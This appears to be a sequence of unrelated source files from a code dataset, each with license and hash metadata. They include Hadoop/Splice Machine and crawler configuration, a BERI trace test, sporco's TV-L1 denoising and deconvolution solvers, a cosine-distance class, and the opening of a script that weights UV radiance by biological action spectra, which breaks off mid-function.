"splice.spark.executor.extraClassPath=/usr/hdp/current/hbase-regionserver/conf:/usr/hdp/current/hbase-regionserver/lib/htrace-core-3.1.0-incubating.jar:/var/lib/splicemachine/*:/usr/hdp/3.1.0.0-78/spark2/jars/*:/usr/hdp/current/hbase-master/lib/*:/usr/hdp/3.1.0.0-78/hbase/lib/atlas-hbase-plugin-impl/kafka*",
"splice.spark.yarn.jars=/usr/hdp/3.1.0.0-78/spark2/jars/*"
]
return dashDProperties
def getRegionServerDashDProperties(self):
dashDProperties = [
"com.sun.management.jmxremote.authenticate=false",
"com.sun.management.jmxremote.ssl=false",
"com.sun.management.jmxremote.port=10102"
]
return dashDProperties
| agpl-3.0 | -3,605,641,735,364,624,400 | 53.634304 | 466 | 0.701635 | false |
seraphlnWu/creditor | configurations/mainnode.py | 1 | 1032 | # coding=utf8
from os.path import join
main_node_host = 'localhost'
main_node_port = 5036
controller_port = 5036
controller_timeout = 10
main_node_manhole_port = 8791
app_root = '/home/wubin/observer'
client_register_timeout = 10
client_request_timeout = 1000 # seconds
request_max_attempts = 1
request_attempt_interval = 1000 # seconds
versions = {
'observer.creditor.active_spider': ((1, 0), (1, 0)),
}
mongo_host = 'localhost'
mongo_port = 27017
mongo_dbname = 'sandbox_keywords'
collection_name = 'accounts'
db_keywords_collection = 'keywords'
client_manhole_port = 8788
min_priority = 1
max_priority = 10
keyword_freq_file = 'keywords_freq_file'
feed_id_file = 'feed_id_file'
keyword_file = ''
db_uids_host = 'localhost'
db_uids_port = 27017
db_uids_dbname = 'sandbox_keywords'
db_uids_collection = 'uids'
db_backtracking_collection = 'backtracking_keywords'
REDIS_HOST = 'localhost'
REDIS_PORT = 6379
kafka_host = 'localhost'
kafka_port = 9092
kafka_topic = "store_topic"
controller_timeout = 15
| apache-2.0 | 5,372,193,645,929,906,000 | 18.471698 | 56 | 0.716085 | false |
8l/beri | cheritest/trunk/tests/trace/test_raw_trace.py | 2 | 2042 | #-
# Copyright (c) 2013 Colin Rothwell
# All rights reserved.
#
# This software was developed by and Colin Rothwell as part of his summer
# internship.
#
# @BERI_LICENSE_HEADER_START@
#
# Licensed to BERI Open Systems C.I.C. (BERI) under one or more contributor
# license agreements. See the NOTICE file distributed with this work for
# additional information regarding copyright ownership. BERI licenses this
# file to you under the BERI Hardware-Software License, Version 1.0 (the
# "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at:
#
# http://www.beri-open-systems.org/legal/license-1-0.txt
#
# Unless required by applicable law or agreed to in writing, Work distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# @BERI_LICENSE_HEADER_END@
#
import sys
from beritest_tools import BaseBERITestCase
def read_trace_records(trace_file_name, record_count, record_width=32):
with open(trace_file_name, 'rb') as trace_file:
return trace_file.read(record_count * record_width)
class test_raw_trace(BaseBERITestCase):
def test_uncached(self):
'''Test trace from uncached memory is as expected'''
actual = read_trace_records('log/test_raw_trace.trace', 5)
expected = read_trace_records('tests/trace/uncached_expected.trace', 5)
self.assertEqual(actual, expected, 'Uncached trace mismatch. Use the '
'readtrace program to debug.')
def test_cached(self):
'''Test trace from cached memory is as expected'''
actual = read_trace_records('log/test_raw_trace_cached.trace', 7)
expected = read_trace_records('tests/trace/cached_expected.trace', 7)
self.assertEqual(actual, expected, 'Cached trace mismatch. Use the '
'readtrace program to debug.')
| apache-2.0 | 5,793,459,442,878,046,000 | 41.541667 | 79 | 0.711557 | false |
bwohlberg/sporco | sporco/admm/tvl1.py | 1 | 24507 | # -*- coding: utf-8 -*-
# Copyright (C) 2015-2020 by Brendt Wohlberg <[email protected]>
# All rights reserved. BSD 3-clause License.
# This file is part of the SPORCO package. Details of the copyright
# and user license can be found in the 'LICENSE.txt' file distributed
# with the package.
r"""Classes for ADMM algorithms for Total Variation (TV) optimisation
with an :math:`\ell_1` data fidelity term"""
from __future__ import division, absolute_import
import copy
import numpy as np
from sporco.admm import admm
from sporco.array import zpad, atleast_nd, zdivide
from sporco.fft import real_dtype, fftn_func, ifftn_func
from sporco.signal import gradient_filters, grad, gradT
from sporco.linalg import rrs
from sporco.prox import prox_l1, prox_l2
__author__ = """Brendt Wohlberg <[email protected]>"""
class TVL1Denoise(admm.ADMM):
r"""ADMM algorithm for :math:`\ell_1`-TV denoising problem
:cite:`alliney-1992-digital` :cite:`esser-2010-primal` (Sec. 2.4.4).
Solve the optimisation problem
.. math::
\mathrm{argmin}_\mathbf{x} \;
\| W_{\mathrm{df}} (\mathbf{x} - \mathbf{s}) \|_1 +
\lambda \left\| W_{\mathrm{tv}} \sqrt{(G_r \mathbf{x})^2 +
(G_c \mathbf{x})^2} \right\|_1
via the ADMM problem
.. math::
\mathrm{argmin}_{\mathbf{x},\mathbf{y}_d,\mathbf{y}_r,\mathbf{y}_c} \;
(1/2) \| W_{\mathrm{df}} \mathbf{y}_d \|_1 +
\lambda \left\| W_{\mathrm{tv}} \sqrt{(\mathbf{y}_r)^2 +
(\mathbf{y}_c)^2} \right\|_1 \;\text{such that}\;
\left( \begin{array}{c} G_r \\ G_c \\ I \end{array} \right)
\mathbf{x} - \left( \begin{array}{c} \mathbf{y}_r \\
\mathbf{y}_c \\ \mathbf{y}_d \end{array}
\right) = \left( \begin{array}{c} \mathbf{0} \\ \mathbf{0} \\
\mathbf{s} \end{array} \right) \;\;,
where :math:`G_r` and :math:`G_c` are gradient operators along array
rows and columns respectively, and :math:`W_{\mathrm{df}}` and
:math:`W_{\mathrm{tv}}` are diagonal weighting matrices.
While these equations describe the default behaviour of regularisation
in two dimensions, this class supports an arbitrary number of
dimensions. For example, for 3D TV regularisation in a 3D array,
the object should be initialised with parameter `axes` set to
`(0, 1, 2)`.
After termination of the :meth:`solve` method, attribute :attr:`itstat`
is a list of tuples representing statistics of each iteration. The
fields of the named tuple ``IterationStats`` are:
``Iter`` : Iteration number
``ObjFun`` : Objective function value
``DFid`` : Value of data fidelity term :math:`\|
W_{\mathrm{df}} (\mathbf{x} - \mathbf{s}) \|_1`
``RegTV`` : Value of regularisation term :math:`\|
W_{\mathrm{tv}} \sqrt{(G_r \mathbf{x})^2 + (G_c \mathbf{x})^2}
\|_1`
``PrimalRsdl`` : Norm of primal residual
``DualRsdl`` : Norm of dual residual
``EpsPrimal`` : Primal residual stopping tolerance
:math:`\epsilon_{\mathrm{pri}}`
``EpsDual`` : Dual residual stopping tolerance
:math:`\epsilon_{\mathrm{dua}}`
``Rho`` : Penalty parameter
``GSIter`` : Number of Gauss-Seidel iterations
``GSRelRes`` : Relative residual of Gauss-Seidel solution
``Time`` : Cumulative run time
"""
class Options(admm.ADMM.Options):
"""TVL1Denoise algorithm options
Options include all of those defined in
:class:`sporco.admm.admm.ADMM.Options`, together with
additional options:
``gEvalY`` : Flag indicating whether the :math:`g` component
of the objective function should be evaluated using variable
Y (``True``) or X (``False``) as its argument.
``MaxGSIter`` : Maximum Gauss-Seidel iterations.
``GSTol`` : Gauss-Seidel stopping tolerance.
``DFidWeight`` : Data fidelity weight matrix.
``TVWeight`` : TV term weight matrix.
"""
defaults = copy.deepcopy(admm.ADMM.Options.defaults)
defaults.update({'gEvalY': True, 'RelaxParam': 1.8,
'DFidWeight': 1.0, 'TVWeight': 1.0,
'GSTol': 0.0, 'MaxGSIter': 2
})
defaults['AutoRho'].update({'Enabled': False, 'Period': 1,
'AutoScaling': True, 'Scaling': 1000.0,
'RsdlRatio': 1.2})
def __init__(self, opt=None):
"""
Parameters
----------
opt : dict or None, optional (default None)
TVL1Denoise algorithm options
"""
if opt is None:
opt = {}
admm.ADMM.Options.__init__(self, opt)
if self['AutoRho', 'RsdlTarget'] is None:
self['AutoRho', 'RsdlTarget'] = 1.0
itstat_fields_objfn = ('ObjFun', 'DFid', 'RegTV')
itstat_fields_extra = ('GSIter', 'GSRelRes')
hdrtxt_objfn = ('Fnc', 'DFid', 'RegTV')
hdrval_objfun = {'Fnc': 'ObjFun', 'DFid': 'DFid', 'RegTV': 'RegTV'}
def __init__(self, S, lmbda, opt=None, axes=(0, 1), caxis=None):
"""
|
**Call graph**
.. image:: ../_static/jonga/tvl1den_init.svg
:width: 20%
:target: ../_static/jonga/tvl1den_init.svg
|
Parameters
----------
S : array_like
Signal vector or matrix
lmbda : float
Regularisation parameter
opt : TVL1Denoise.Options object
Algorithm options
axes : tuple, optional (default (0, 1))
Axes on which TV regularisation is to be applied
caxis : int or None, optional (default None)
Axis on which channels of a multi-channel image are stacked.
If None, TV regularisation is applied indepdendently to each
channel, otherwise Vector TV :cite:`blomgren-1998-color`
regularisation is applied jointly to all channels.
"""
if opt is None:
opt = TVL1Denoise.Options()
# Set flag indicating whether problem involves real or complex
# values
self.real_dtype = np.isrealobj(S)
# Set dtype attribute based on S.dtype and opt['DataType']
self.set_dtype(opt, S.dtype)
self.S = np.asarray(S, dtype=self.dtype)
self.axes = axes
if caxis is None:
self.saxes = (-1,)
else:
self.saxes = (caxis, -1)
self.lmbda = real_dtype(self.dtype).type(lmbda)
# Set penalty parameter
self.set_attr('rho', opt['rho'], dval=(2.0*self.lmbda + 0.1),
dtype=real_dtype(self.dtype))
yshape = S.shape + (len(axes)+1,)
super(TVL1Denoise, self).__init__(S.size, yshape, yshape, S.dtype, opt)
self.Wdf = np.asarray(self.opt['DFidWeight'],
dtype=real_dtype(self.dtype))
self.lcw = self.LaplaceCentreWeight()
self.Wtv = np.asarray(self.opt['TVWeight'],
dtype=real_dtype(self.dtype))
if hasattr(self.Wtv, 'ndim') and self.Wtv.ndim == S.ndim:
self.Wtvna = self.Wtv[..., np.newaxis]
else:
self.Wtvna = self.Wtv
# Need to initialise X because of Gauss-Seidel in xstep
self.X = self.S
def uinit(self, ushape):
"""Return initialiser for working variable U."""
if self.opt['Y0'] is None:
return np.zeros(ushape, dtype=self.dtype)
else:
# If initial Y is non-zero, initial U is chosen so that
# the relevant dual optimality criterion (see (3.10) in
# boyd-2010-distributed) is satisfied.
Yss = np.sqrt(np.sum(self.Y[..., 0:-1]**2, axis=self.S.ndim,
keepdims=True))
U0 = (self.lmbda/self.rho)*zdivide(self.Y[..., 0:-1], Yss)
U1 = (1.0 / self.rho)*np.sign(self.Y[..., -1:])
return np.concatenate((U0, U1), axis=self.S.ndim)
def xstep(self):
r"""Minimise Augmented Lagrangian with respect to
:math:`\mathbf{x}`.
"""
ngsit = 0
gsrrs = np.inf
YU = self.Y - self.U
SYU = self.S + YU[..., -1]
YU[..., -1] = 0.0
ATYU = self.cnst_AT(YU)
while gsrrs > self.opt['GSTol'] and ngsit < self.opt['MaxGSIter']:
self.X = self.GaussSeidelStep(
SYU, self.X, ATYU, 1.0, self.lcw, 1.0)
gsrrs = rrs(
self.cnst_AT(self.cnst_A(self.X)),
self.cnst_AT(self.cnst_c() - self.cnst_B(self.Y) - self.U)
)
ngsit += 1
self.xs = (ngsit, gsrrs)
def ystep(self):
r"""Minimise Augmented Lagrangian with respect to
:math:`\mathbf{y}`.
"""
self.Y[..., 0:-1] = prox_l2(
self.AX[..., 0:-1] + self.U[..., 0:-1],
(self.lmbda/self.rho)*self.Wtvna, axis=self.saxes)
self.Y[..., -1] = prox_l1(
self.AX[..., -1] + self.U[..., -1] - self.S,
(1.0/self.rho)*self.Wdf)
def obfn_gvar(self):
"""Variable to be evaluated in computing regularisation term,
depending on 'gEvalY' option value.
"""
if self.opt['gEvalY']:
return self.Y
else:
return self.cnst_A(self.X) - self.cnst_c()
def eval_objfn(self):
r"""Compute components of objective function as well as total
contribution to objective function. Data fidelity term is
:math:`(1/2) \| \mathbf{x} - \mathbf{s} \|_2^2` and
regularisation term is :math:`\| W_{\mathrm{tv}}
\sqrt{(G_r \mathbf{x})^2 + (G_c \mathbf{x})^2}\|_1`.
"""
if self.real_dtype:
gvr = self.obfn_gvar()
else:
gvr = np.abs(self.obfn_gvar())
dfd = np.sum(np.abs(self.Wdf * gvr[..., -1]))
reg = np.sum(self.Wtv * np.sqrt(np.sum(gvr[..., 0:-1]**2,
axis=self.saxes)))
obj = dfd + self.lmbda*reg
return (obj, dfd, reg)
def itstat_extra(self):
"""Non-standard entries for the iteration stats record tuple."""
return (self.xs[0], self.xs[1])
def cnst_A(self, X):
r"""Compute :math:`A \mathbf{x}` component of ADMM problem
constraint. In this case :math:`A \mathbf{x} = (G_r^T \;\; G_c^T
\;\; I)^T \mathbf{x}`.
"""
return np.concatenate(
[grad(X, ax)[..., np.newaxis] for ax in self.axes] +
[X[..., np.newaxis],], axis=X.ndim)
def cnst_AT(self, X):
r"""Compute :math:`A^T \mathbf{x}` where :math:`A \mathbf{x}` is
a component of ADMM problem constraint. In this case
:math:`A^T \mathbf{x} = (G_r^T \;\; G_c^T \;\; I) \mathbf{x}`.
"""
return np.sum(np.concatenate(
[gradT(X[..., ax], ax)[..., np.newaxis] for ax in self.axes] +
[X[..., -1:],], axis=X.ndim-1), axis=X.ndim-1)
def cnst_B(self, Y):
r"""Compute :math:`B \mathbf{y}` component of ADMM problem
constraint. In this case :math:`B \mathbf{y} = -\mathbf{y}`.
"""
return -Y
def cnst_c(self):
r"""Compute constant component :math:`\mathbf{c}` of ADMM problem
constraint. In this case :math:`\mathbf{c} = (\mathbf{0} \;\;
\mathbf{0} \;\; \mathbf{s})`.
"""
c = np.zeros(self.S.shape + (len(self.axes)+1,), self.dtype)
c[..., -1] = self.S
return c
def rsdl_s(self, Yprev, Y):
"""Compute dual residual vector."""
return self.rho*np.linalg.norm(self.cnst_AT(self.U))
def rsdl_sn(self, U):
"""Compute dual residual normalisation term."""
return self.rho*np.linalg.norm(U)
def LaplaceCentreWeight(self):
"""Centre weighting matrix for TV Laplacian."""
sz = [1,] * self.S.ndim
for ax in self.axes:
sz[ax] = self.S.shape[ax]
lcw = 2*len(self.axes)*np.ones(sz, dtype=self.dtype)
for ax in self.axes:
lcw[(slice(None),)*ax + ([0, -1],)] -= 1.0
return lcw
def GaussSeidelStep(self, S, X, ATYU, rho, lcw, W2):
"""Gauss-Seidel step for linear system in TV problem."""
Xss = np.zeros_like(S, dtype=self.dtype)
for ax in self.axes:
Xss += zpad(X[(slice(None),)*ax + (slice(0, -1),)], (1, 0), ax)
Xss += zpad(X[(slice(None),)*ax + (slice(1, None),)],
(0, 1), ax)
return (rho*(Xss + ATYU) + W2*S) / (W2 + rho*lcw)
class TVL1Deconv(admm.ADMM):
r"""ADMM algorithm for :math:`\ell_1`-TV deconvolution problem.
Solve the optimisation problem
.. math::
\mathrm{argmin}_\mathbf{x} \;
\| W_{\mathrm{df}} (H \mathbf{x} - \mathbf{s}) \|_1 +
\lambda \left\| W_{\mathrm{tv}} \sqrt{(G_r \mathbf{x})^2 +
(G_c \mathbf{x})^2} \right\|_1 \;\;,
where :math:`H` denotes the linear operator corresponding to a
convolution, :math:`G_r` and :math:`G_c` are gradient operators
along array rows and columns respectively, and
:math:`W_{\mathrm{df}}` and :math:`W_{\mathrm{tv}}` are diagonal
weighting matrices, via the ADMM problem
.. math::
\mathrm{argmin}_{\mathbf{x},\mathbf{y}_d,\mathbf{y}_r,\mathbf{y}_c} \;
(1/2) \| W_{\mathrm{df}} \mathbf{y}_d \|_1 +
\lambda \left\| W_{\mathrm{tv}} \sqrt{(\mathbf{y}_r)^2 +
(\mathbf{y}_c)^2} \right\|_1 \;\text{such that}\;
\left( \begin{array}{c} G_r \\ G_c \\ H \end{array} \right)
\mathbf{x} - \left( \begin{array}{c} \mathbf{y}_r \\
\mathbf{y}_c \\ \mathbf{y}_d \end{array}
\right) = \left( \begin{array}{c} \mathbf{0} \\ \mathbf{0} \\
\mathbf{s} \end{array} \right) \;\;.
While these equations describe the default behaviour of regularisation
in two dimensions, this class supports an arbitrary number of
dimensions. For example, for 3D TV regularisation in a 3D array,
the object should be initialised with parameter `axes` set to
`(0, 1, 2)`.
Note that the convolution is implemented in the frequency domain,
having the same phase offset as :func:`.fftconv`, which differs from
that of :func:`scipy.ndimage.convolve` with the default ``origin``
parameter.
After termination of the :meth:`solve` method, attribute :attr:`itstat`
is a list of tuples representing statistics of each iteration. The
fields of the named tuple ``IterationStats`` are:
``Iter`` : Iteration number
``ObjFun`` : Objective function value
``DFid`` : Value of data fidelity term :math:`\|
W_{\mathrm{df}} (H \mathbf{x} - \mathbf{s}) \|_1`
``RegTV`` : Value of regularisation term :math:`\|
W_{\mathrm{tv}} \sqrt{(G_r \mathbf{x})^2 + (G_c \mathbf{x})^2}
\|_1`
``PrimalRsdl`` : Norm of primal residual
``DualRsdl`` : Norm of dual residual
``EpsPrimal`` : Primal residual stopping tolerance
:math:`\epsilon_{\mathrm{pri}}`
``EpsDual`` : Dual residual stopping tolerance
:math:`\epsilon_{\mathrm{dua}}`
``Rho`` : Penalty parameter
``XSlvRelRes`` : Relative residual of X step solver
``Time`` : Cumulative run time
"""
class Options(admm.ADMM.Options):
"""TVL1Deconv algorithm options
Options include all of those defined in
:class:`sporco.admm.admm.ADMM.Options`, together with
additional options:
``gEvalY`` : Flag indicating whether the :math:`g` component
of the objective function should be evaluated using variable
Y (``True``) or X (``False``) as its argument.
``LinSolveCheck`` : If ``True``, compute relative residual of
X step solver.
``DFidWeight`` : Data fidelity weight matrix.
``TVWeight`` : TV term weight matrix.
"""
defaults = copy.deepcopy(admm.ADMM.Options.defaults)
defaults.update(
{'gEvalY': True, 'RelaxParam': 1.8, 'LinSolveCheck': False,
'DFidWeight': 1.0, 'TVWeight': 1.0})
defaults['AutoRho'].update(
{'Enabled': False, 'Period': 1, 'AutoScaling': True,
'Scaling': 1000.0, 'RsdlRatio': 1.2})
def __init__(self, opt=None):
"""
Parameters
----------
opt : dict or None, optional (default None)
TVL1Deconv algorithm options
"""
if opt is None:
opt = {}
admm.ADMM.Options.__init__(self, opt)
if self['AutoRho', 'RsdlTarget'] is None:
self['AutoRho', 'RsdlTarget'] = 1.0
itstat_fields_objfn = ('ObjFun', 'DFid', 'RegTV')
itstat_fields_extra = ('XSlvRelRes',)
hdrtxt_objfn = ('Fnc', 'DFid', 'RegTV')
hdrval_objfun = {'Fnc': 'ObjFun', 'DFid': 'DFid', 'RegTV': 'RegTV'}
def __init__(self, A, S, lmbda, opt=None, axes=(0, 1), caxis=None):
"""
|
**Call graph**
.. image:: ../_static/jonga/tvl1dcn_init.svg
:width: 20%
:target: ../_static/jonga/tvl1dcn_init.svg
|
Parameters
----------
A : array_like
Filter kernel corresponding to operator :math:`H` above
S : array_like
Signal vector or matrix
lmbda : float
Regularisation parameter
opt : TVL1Deconv.Options object
Algorithm options
axes : tuple, optional (default (0, 1))
Axes on which TV regularisation is to be applied
caxis : int or None, optional (default None)
Axis on which channels of a multi-channel image are stacked.
If None, TV regularisation is applied indepdendently to each
channel, otherwise Vector TV :cite:`blomgren-1998-color`
regularisation is applied jointly to all channels.
"""
if opt is None:
opt = TVL1Deconv.Options()
# Set flag indicating whether problem involves real or complex
# values, and get appropriate versions of functions from fft
# module
self.real_dtype = np.isrealobj(S)
self.fftn = fftn_func(self.real_dtype)
self.ifftn = ifftn_func(self.real_dtype)
# Set dtype attribute based on S.dtype and opt['DataType']
self.set_dtype(opt, S.dtype)
self.axes = axes
self.axsz = tuple([S.shape[i] for i in axes])
if caxis is None:
self.saxes = (-1,)
else:
self.saxes = (caxis, -1)
self.lmbda = real_dtype(self.dtype).type(lmbda)
# Set penalty parameter
self.set_attr('rho', opt['rho'], dval=(2.0*self.lmbda + 0.1),
dtype=real_dtype(self.dtype))
yshape = S.shape + (len(axes)+1,)
self.S = np.asarray(S, dtype=self.dtype)
super(TVL1Deconv, self).__init__(S.size, yshape, yshape, S.dtype, opt)
self.axshp = tuple([S.shape[k] for k in axes])
self.A = atleast_nd(S.ndim, A.astype(self.dtype))
self.Af = self.fftn(self.A, self.axshp, axes=axes)
self.Sf = self.fftn(self.S, axes=axes)
self.AHAf = np.conj(self.Af)*self.Af
self.AHSf = np.conj(self.Af)*self.Sf
self.Wdf = np.asarray(self.opt['DFidWeight'],
dtype=real_dtype(self.dtype))
self.Wtv = np.asarray(self.opt['TVWeight'],
dtype=real_dtype(self.dtype))
if hasattr(self.Wtv, 'ndim') and self.Wtv.ndim == S.ndim:
self.Wtvna = self.Wtv[..., np.newaxis]
else:
self.Wtvna = self.Wtv
self.Gf, self.GHGf = gradient_filters(S.ndim, axes, self.axshp,
dtype=self.dtype)
self.GAf = np.concatenate((self.Gf, self.Af[..., np.newaxis]),
axis=self.Gf.ndim-1)
def uinit(self, ushape):
"""Return initialiser for working variable U."""
if self.opt['Y0'] is None:
return np.zeros(ushape, dtype=self.dtype)
else:
# If initial Y is non-zero, initial U is chosen so that
# the relevant dual optimality criterion (see (3.10) in
# boyd-2010-distributed) is satisfied.
Yss = np.sqrt(np.sum(self.Y[..., 0:-1]**2, axis=self.S.ndim,
keepdims=True))
U0 = (self.lmbda/self.rho)*zdivide(self.Y[..., 0:-1], Yss)
U1 = (1.0 / self.rho)*np.sign(self.Y[..., -1:])
return np.concatenate((U0, U1), axis=self.S.ndim)
def xstep(self):
r"""Minimise Augmented Lagrangian with respect to
:math:`\mathbf{x}`.
"""
b = self.AHSf + np.sum(
np.conj(self.GAf) * self.fftn(self.Y-self.U, axes=self.axes),
axis=self.Y.ndim-1)
self.Xf = b / (self.AHAf + self.GHGf)
self.X = self.ifftn(self.Xf, self.axsz, axes=self.axes)
if self.opt['LinSolveCheck']:
ax = (self.AHAf + self.GHGf)*self.Xf
self.xrrs = rrs(ax, b)
else:
self.xrrs = None
def ystep(self):
r"""Minimise Augmented Lagrangian with respect to
:math:`\mathbf{y}`.
"""
self.Y[..., 0:-1] = prox_l2(
self.AX[..., 0:-1] + self.U[..., 0:-1],
(self.lmbda/self.rho)*self.Wtvna, axis=self.saxes)
self.Y[..., -1] = prox_l1(
self.AX[..., -1] + self.U[..., -1] - self.S,
(1.0/self.rho)*self.Wdf)
def obfn_gvar(self):
"""Variable to be evaluated in computing regularisation term,
depending on 'gEvalY' option value.
"""
if self.opt['gEvalY']:
return self.Y
else:
return self.cnst_A(None, self.Xf) - self.cnst_c()
def eval_objfn(self):
r"""Compute components of objective function as well as total
contribution to objective function. Data fidelity term is
:math:`\| W_{\mathrm{df}} (H \mathbf{x} - \mathbf{s}) \|_1` and
regularisation term is :math:`\| W_{\mathrm{tv}}
\sqrt{(G_r \mathbf{x})^2 + (G_c \mathbf{x})^2}\|_1`.
"""
if self.real_dtype:
gvr = self.obfn_gvar()
else:
gvr = np.abs(self.obfn_gvar())
dfd = np.sum(self.Wdf * np.abs(gvr[..., -1]))
reg = np.sum(self.Wtv * np.sqrt(np.sum(gvr[..., 0:-1]**2,
axis=self.saxes)))
obj = dfd + self.lmbda*reg
return (obj, dfd, reg)
def itstat_extra(self):
"""Non-standard entries for the iteration stats record tuple."""
return (self.xrrs,)
def cnst_A(self, X, Xf=None):
r"""Compute :math:`A \mathbf{x}` component of ADMM problem
constraint. In this case :math:`A \mathbf{x} = (G_r^T \;\;
G_c^T \;\; H)^T \mathbf{x}`.
"""
if Xf is None:
Xf = self.fftn(X, axes=self.axes)
return self.ifftn(self.GAf*Xf[..., np.newaxis], self.axsz,
axes=self.axes)
def cnst_AT(self, X):
r"""Compute :math:`A^T \mathbf{x}` where :math:`A \mathbf{x}` is
a component of ADMM problem constraint. In this case
:math:`A^T \mathbf{x} = (G_r^T \;\; G_c^T \;\; H^T) \mathbf{x}`.
"""
Xf = self.fftn(X, axes=self.axes)
return np.sum(self.ifftn(np.conj(self.GAf)*Xf, self.axsz,
axes=self.axes), axis=self.Y.ndim-1)
def cnst_B(self, Y):
r"""Compute :math:`B \mathbf{y}` component of ADMM problem
constraint. In this case :math:`B \mathbf{y} = -\mathbf{y}`.
"""
return -Y
def cnst_c(self):
r"""Compute constant component :math:`\mathbf{c}` of ADMM problem
constraint. In this case :math:`\mathbf{c} = (\mathbf{0} \;\;
\mathbf{0} \;\; \mathbf{s})`.
"""
c = np.zeros(self.S.shape + (len(self.axes)+1,), self.dtype)
c[..., -1] = self.S
return c
def rsdl_s(self, Yprev, Y):
"""Compute dual residual vector."""
return self.rho*np.linalg.norm(self.cnst_AT(self.U))
def rsdl_sn(self, U):
"""Compute dual residual normalisation term."""
return self.rho*np.linalg.norm(U)
| bsd-3-clause | 4,074,499,690,839,444,500 | 31.373844 | 79 | 0.541478 | false |
ml-lab/NearPy | nearpy/distances/cosine.py | 1 | 1649 | # -*- coding: utf-8 -*-
# Copyright (c) 2013 Ole Krause-Sparmann
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import numpy
import scipy
from nearpy.distances.distance import Distance
class CosineDistance(Distance):
""" Uses 1-cos(angle(x,y)) as distance measure. """
def distance(self, x, y):
"""
Computes distance measure between vectors x and y. Returns float.
"""
if scipy.sparse.issparse(x):
x = x.toarray().ravel()
y = y.toarray().ravel()
return 1.0 - numpy.dot(x, y) / (numpy.linalg.norm(x) *
numpy.linalg.norm(y))
| mit | 4,337,693,486,132,774,400 | 40.225 | 79 | 0.703457 | false |
sukritranjan/ranjansasselov2016b | compute_UV_doses.py | 1 | 29816 | # -*- coding: iso-8859-1 -*-
"""
This code is used to weigh the UV radiances we compute by biological action spectra.
"""
########################
###Import useful libraries
########################
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import pdb
from matplotlib.pyplot import cm
from scipy import interpolate as interp
import scipy.integrate
########################
###Set physical constants
########################
hc=1.98645e-9 #value of h*c in erg*nm
def cm2inch(cm): #function to convert cm to inches; useful for complying with Astrobiology size guidelines
return cm/2.54
########################
###Decide which bits of the calculation will be run
########################
plotactionspec=False #if true, plots the action spectra we are using.
plotactionspec_talk=False #if true, plots the action spectra we are using...but, optimized for a talk instead of a paper
calculatealbaz=False #if true, generates the table for the albedo and zenith angle study
calculateco2=False #if true, generates the table for the co2 study
calculatealtgas=True #if true, generates the table for the alternate gas study
########################
###Helper functions: I/O
########################
def get_UV(filename):
"""
Input: filename (including path)
Output: (wave_leftedges, wav_rightedges, surface radiance) in units of (nm, nm, photons/cm2/sec/nm)
"""
wav_leftedges, wav_rightedges, wav, toa_intensity, surface_flux, surface_intensity, surface_intensity_diffuse, surface_intensity_direct=np.genfromtxt(filename, skip_header=1, skip_footer=0, usecols=(0, 1, 2,3,4,6,7,8), unpack=True)
surface_intensity_photons=surface_intensity*(wav/(hc))
return wav_leftedges, wav_rightedges, surface_intensity_photons
########################
###Helper functions: UV Dosimeters
########################
def integrated_radiance(wav_left, wav_right, surf_int, leftlim, rightlim):
"""
Computes the surface radiance integrated from leftlim to rightlim. Does this by doing a trapezoid sum. NOTE: The method I have chosen works only so long as the limits line up with the bin edges!
wav_left: left edge of wavelength bin, in nm
wav_right: right edge of wavelength bin, in nm
surf_int: total surface intensity (radiance, hemispherically-integrated) in photons/cm2/s/nm, in bin defined by wav_left and wav_right
produceplots: if True, shows plots of what it is computing
returnxy: if True, returns x,y for action spectrum.
"""
allowed_inds=np.where((wav_left>=leftlim) & (wav_right<=rightlim))
delta_wav=wav_right[allowed_inds]-wav_left[allowed_inds]
surf_int_integrated=np.sum(surf_int[allowed_inds]*delta_wav) #integration converts from photons/cm2/s/nm to photons/cm2/s
return surf_int_integrated
def tricyano_aqe_prodrate(wav_left, wav_right, surf_int, lambda0, produceplots, returnxy):
"""
Weights the input surface intensities by the action spectrum for the photoproduction of aquated electrons from Ritson+2012 and Patel+2015, i.e. irradiation of tricyano cuprate. The action spectrum is composed of the absorption spectrum multiplied by an assumed quantum yield function. We assume the QY function to be a step function, stepping from 0 at wavelengths longer than lambda0 to 0.06 at wavelengths shorter than lambda0. We choose 0.06 for the step function to match the estimate found by Horvath+1984; we note this value may be pH sensitive. Empirically, we know that lambda0>254 nm, but that's about it.
This process is an eustressor for abiogenesis.
wav_left: left edge of wavelength bin, in nm
wav_right: right edge of wavelength bin, in nm
surf_int: total surface intensity (radiance, hemispherically-integrated) in photons/cm2/s/nm, in bin defined by wav_left and wav_right
lambda0: value assume for lambda0.
produceplots: if True, shows plots of what it is computing
returnxy: if True, returns x,y for action spectrum.
"""
####Step 1: reduce input spectrum to match bounds of available dataset.
int_min=190.0 #This lower limit of integration is set by the limits of the cucn3 absorption dataset (left edge of bin)
int_max=351.0 #This upper limit of integration is set by the limits of the cucn3 absorption dataset (right edge of bin)
allowed_inds=np.where((wav_left>=int_min) & (wav_right<=int_max)) #indices that correspond to included data
wav_left=wav_left[allowed_inds]
wav_right=wav_right[allowed_inds]
surf_int=surf_int[allowed_inds]
delta_wav=wav_right-wav_left #size of wavelength bins in nm
####Step 2: form the action spectrum from the absorption spectrum and QY curve.
#Import the tricyanocuprate absorption spectrum
importeddata=np.genfromtxt('./Raw_Data/Magnani_Data/CuCN3_XC.dat', skip_header=2)
